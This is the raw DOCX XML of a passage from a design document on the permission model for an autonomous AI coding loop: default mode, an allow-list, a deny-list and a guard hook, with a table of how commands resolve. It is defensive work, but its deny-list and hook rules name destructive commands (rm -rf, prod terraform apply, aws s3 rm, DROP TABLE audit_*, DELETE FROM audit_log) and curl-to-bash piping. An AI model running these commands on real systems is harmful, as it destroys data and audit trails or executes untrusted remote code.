                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>terraform apply</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> against prod paths, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>aws ... delete-*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> against prod accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>11. Permission model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The autonomous loop cannot run with prompts on every Bash call — it would block on consent. But 'auto-approve everything' is the wrong knob. The permission model is four layers, deepest first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Layer 1 — Permission mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the loop in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permission mode, NOT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>bypassPermissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>acceptEdits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Approval is granted by the allow-list (Layer 2), not by relaxing the mode globally. Unknown commands still prompt → which for an unattended loop means 'pause this lane until human checks in', the correct fallback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Layer 2 — Allow-list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-approved patterns in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>.claude/settings.local.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. The loop runs at full speed on these without prompting. Patterns include pytest, xcodebuild, docker compose, gh pr/run, git add/commit/push to lane branches, terraform plan/apply with dev tfvars, alembic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Layer 3 — Deny-list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hard blocks. Even if a future allow-list entry would match, the deny-list wins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>rm -rf:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, force-push, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>git push origin main</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>terraform apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> against prod or staging tfvars</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>aws s3 rm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>aws dynamodb delete-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, prod profile invocation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audit table mutations (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>DROP TABLE audit_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>DELETE FROM audit_log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Curl-to-bash piping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Layer 4 — PreToolUse hook (`guard-destructive.sh`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Catches what the deny-list regex can't express cleanly: multi-command bash strings where the destructive bit is hidden, prod-account IDs anywhere in the command, anything that pipes to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a remote source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>How the layers compose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592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>L1 mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>L2 allow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>L3 deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>L4 hook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>python3 -m pytest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>matches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>auto-approve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>terraform apply dev.tfvars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>matches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>passes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>auto-approve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>terraform apply prod.tfvars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>matches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>(skipped)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>rm -rf backend/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
